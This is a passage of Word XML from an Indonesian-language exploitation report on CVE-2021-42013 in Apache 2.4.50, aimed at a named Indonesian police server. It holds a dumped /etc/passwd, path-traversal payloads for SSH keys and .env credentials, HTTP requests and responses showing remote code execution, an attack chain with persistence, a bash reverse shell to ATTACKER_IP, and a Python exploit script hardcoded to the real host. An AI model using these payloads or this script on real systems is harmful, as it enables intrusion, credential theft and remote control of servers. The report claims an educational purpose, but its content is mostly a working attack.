    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3412F51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libstoragemgmt:x:998:997:daemon account libstoragemgmt:/var/run/lsm:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="01B34ED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abrt:x:173:173::/etc/abrt:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="299F937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rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0D947C04" wp14:textId="4632811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sshd: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x:74:74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:Privilege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separated SSH:/var/empty/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sshd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:/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sbin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nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4BB5866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postfix:x:89:89::/var/spool/postfix:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7102C17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ntp:x:38:38::/etc/ntp:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7B8E4C3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chrony:x:997:995::/var/lib/chrony:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="20274C0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tcpdump:x:72:72::/:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6E689CC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infra:x:1000:1000::/home/infra:/bin/bash                ← SHELL AKTIF</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4C6B39E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admdumas:x:1001:1001::/home/admdumas:/bin/bash           ← SHELL AKTIF</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2934A28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webuzo:x:996:994::/home/webuzo:/bin/bash                 ← SHELL AKTIF</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3749F33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saslauth:x:995:76:Saslauthd user:/run/saslauthd:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2BE6E40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mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3AA22F1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smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6E192E2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emps:x:994:1002::/home/emps:/bin/bash                    ← SHELL AKTIF</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="07459315" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3795C4C6" wp14:textId="5A90EF3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10.5 File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File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Sensitif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Lain yang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Dapat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Dibaca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 xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="37326504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3E15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File Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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C42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Path Traversal Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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6CD0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Informasi yang Terekspos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="594CBC6A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85E1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/etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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291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[payload]/etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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986C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Daftar semua pengguna sistem, UID, home dir, shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="569EBCBC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3342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/etc/hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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DB54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[payload]/etc/hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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00A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Pemetaan hostname internal, IP internal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="60F42D28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6423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/etc/apache2/httpd.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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365B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[payload]/etc/apache2/httpd.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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73FC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Konfigurasi Apache lengkap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="583B8A01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4770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/proc/version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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F5F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[payload]/proc/version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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92D5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Versi kernel Linux secara presisi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="1925A9EF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B180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/proc/net/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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9565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[payload]/proc/net/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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6B4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Koneksi TCP aktif, port yang terbuka</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="677DEFDA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98ED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~/.ssh/id_rsa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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F800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[payload]/home/infra/.ssh/id_rsa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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F6C3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Private key SSH pengguna infra (jika ada)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="06F27180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9B1B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/var/www/html/.env</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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4720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[payload]/var/www/html/.env</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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62B5B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Kredensial database, API keys aplikasi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="4B251E35" wp14:textId="77777777"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C3AB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/etc/crontab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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B375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[payload]/etc/crontab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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1123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Scheduled tasks, potensi persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6537F28F" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="485EE640" wp14:textId="07617F59">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B3A6B" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="14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 xml:space="preserve">11. Proof of Concept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 xml:space="preserve"> Remote Code Execution (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="28068016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Eksploitasi tahap kedua memanfaatkan endpoint CGI yang dikombinasikan dengan path traversal untuk mengeksekusi binary /bin/sh secara langsung. Apache's CGI handler akan mengirimkan POST body sebagai input ke shell, memungkinkan eksekusi perintah arbitrer.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="57AB9344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11.1 Persyaratan untuk RCE</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="51CB7C1D" wp14:textId="729C9364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mod_cgi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atau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mod_cgid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Harus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aktif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dan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dikonfigurasi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untuk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endpoint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dieksploitasi</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="461363CB" wp14:textId="4841037F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Traversal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/bin/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Path traversal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harus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berhasil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mencapai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/bin/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atau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binary shell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lainnya</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="288AC2C0" wp14:textId="0AD7C92C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Konten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POST body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Perintah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shell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dikirim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sebagai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HTTP POST body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dengan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format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benar</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0864868C" wp14:textId="36335433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Konfigurasi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CGI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rentan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ScriptAlias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atau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Options +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ExecCGI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harus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aktif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pada path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diakses</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6DFB9E20" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6157936D" wp14:textId="2A580318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11.2 HTTP Request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RCE via /bin/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sh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POST</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0549037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POST /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2496417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Host: dumaspresisi.itwasum.polri.go.id:8080</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1566ACD6" wp14:textId="4B3B5925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User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Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5B39EE0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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="304BADB3" wp14:textId="40EA3F1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Accept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Language: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en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US,en;q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=0.5</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1AF31D62" wp14:textId="618EC76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Accept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Encoding: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gzip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, deflate</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4841331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Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2A7F2167" wp14:textId="65C5132B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Type: application/x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www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form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urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3713A115" wp14:textId="48E8E7C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Length: 7</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="707D7BC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4796F6F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echo;id</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="70DF9E56" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="54C12781" wp14:textId="38700C3D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11.3 HTTP Response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Eksekusi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Berhasil</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3D28CCDC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HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="43A3B94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Date: Mon, 18 Oct 2021 10:42:40 GMT</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7E37AD1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Server: Apache/2.4.50 (Unix)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5489B19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Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="744BB2A3" wp14:textId="600858F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Length: 45</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2A47D51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56503A1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uid=1(daemon) gid=1(daemon) groups=1(daemon)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="15E4894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14B90C6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← Perintah 'id' berhasil dieksekusi sebagai user 'daemon' (uid=1)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5AD0F1F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Ini mengkonfirmasi Remote Code Execution penuh</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="44E871BC" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6F432E98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11.4 Attack Chain Lengkap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00"/>
        <w:gridCol w:w="3560"/>
      </w:tblGrid>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="526E2C78" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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DE3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16EC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Teknik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1051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Payload / Command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7896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Output / Dampak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="7130979B" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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149B" wp14:textId="6FA497DD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1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Recon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0CA8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HTTP Banner Grab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6F7F" wp14:textId="4B171ED8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curl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I http://target:8080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EE31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Identifikasi Apache 2.4.50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="765CB57D" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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E19B" wp14:textId="3F03FD7F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2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Scan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9936" wp14:textId="34939ACB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CVE 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43BF" wp14:textId="24FCEF6A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CVE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2021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42013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F7BC" wp14:textId="18C67DFB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Konfirmasi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kerentanan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</w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="163C371F" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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2C1A" wp14:textId="2C493698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3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Encode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AA1D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Double URL Encode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4ED4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../ → %%32%65%%32%65/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10BD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Payload bypass normalisasi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="0FE27540" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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EA1C" wp14:textId="7C5A8491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4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Traversal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F9C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Path Traversal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38D4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GET /icons/[payload]/etc/passwd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8244" wp14:textId="3967CDC9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Baca /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etc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/passwd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31 users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="034AE208" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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2380" wp14:textId="704116FF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5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Escalate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D90E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CGI Execution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6425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POST /icons/[payload]/bin/sh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A761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Shell execution via mod_cgi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="2E6887A4" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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DDA2" wp14:textId="0CB18879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6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RCE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B1AD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Command Injection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0E0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echo;id → uid=daemon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FA18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Remote code execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="583C437D" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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6CD4" wp14:textId="00DF745E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7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Post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Exploit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5AD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Enumeration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E0F7" wp14:textId="0FFC69F4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uname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a; netstat;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ps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aux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DBF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System &amp; network info</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="2F78153D" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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0DDA" wp14:textId="3965D68B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8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Persist</w:t>
            </w:r>
          </w:p>
        </w:tc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E09C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Backdoor (PoC only)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730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chmod +x; crontab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8992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Persistence (tidak dilakukan)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="144A5D23" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="357F871D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12. Advanced Exploitation Techniques</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0B9378AC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Bagian ini mendokumentasikan teknik eksploitasi lanjutan yang dapat dilakukan penyerang setelah mendapatkan akses RCE awal. Dokumentasi ini bersifat edukatif dan bertujuan untuk membantu defender memahami ruang lingkup risiko secara penuh.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="57D3A374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12.1 Reverse Shell via RCE</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="69293D0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Attacker: buka listener di mesin penyerang (IP: ATTACKER_IP, Port: 4444)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1BAB452B" wp14:textId="1B7592FC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$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nc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lvnp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4444</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0A4E68E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62A9A2B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Payload POST body untuk reverse shell bash:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="08BAB85F" wp14:textId="29EFC8A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echo;bash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&gt;&amp; /dev/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tcp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/ATTACKER_IP/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="30E85FE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6A4E948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Request Burp Suite (POST body):</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="03C07A8E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POST /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5786DC7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Host: dumaspresisi.itwasum.polri.go.id:8080</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="05EB2D0E" wp14:textId="6F31C41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Type: application/x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www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form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urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5F956A87" wp14:textId="3D54E29A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Length: [LEN]</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2080AEB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6FBAA3CF" wp14:textId="4CDCB69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echo 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Type: text/plain; echo; bash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&gt;&amp; /dev/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tcp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/ATTACKER_IP/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="29AC5F5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72E326C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Attacker mendapat shell interaktif:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6EA4599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Connection from [TARGET_IP]:XXXXX</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="73A4A81C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bash: no job control in this shell</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="106789C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[daemon@server /]$</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="738610EB" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7CE6ECD1" wp14:textId="1FD65B7F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12.2 Python Script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 Automated Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="55A7555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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5666A3A6" wp14:textId="366E878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# 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42013 Automated Exploit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Educational PoC</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3909177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Author: pwn0sec | For research purposes only</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4A2859A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1E87F92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import requests</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="01152A4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import sys</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="08478BC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from urllib.parse import quote</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1ECA394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6B97D4D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TARGET = 'http://dumaspresisi.itwasum.polri.go.id:8080'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="76E2CE2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DEPTH  = 7  # traversal depth</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5F21F27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189AC4F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def build_payload(target_file):</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="486FF86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traversal = '%%32%65%%32%65/' * DEPTH</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="33AF5BF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return f'/icons/{traversal}{target_file.lstrip("/")}'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7146A6A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2E08E3A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def read_file(target_file):</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3A3741E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url  = TARGET + build_payload(target_file)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="66FC7B4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resp = requests.get(url, allow_redirects=False,</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2AE68EC5" wp14:textId="36B84ACB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            headers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={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'User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Agent': 'Mozilla/5.0'})</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="24AAD8E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if resp.status_code == 200:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3884CEE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return resp.text</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="239D5F4E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return None</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3E22685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625CB75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def rce(command):</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="65FF5EE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url  = TARGET + build_payload('/bin/sh')</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5CC5445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data = f'echo;{command}'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="39C030D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resp = requests.post(url, data=data, allow_redirects=False,</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="45BFC135" wp14:textId="29775EB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               headers={'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Type':'application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www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form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urlencoded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'})</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="285F8CA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if resp.status_code == 200:</w:t>
      </w:r>
    </w:p>
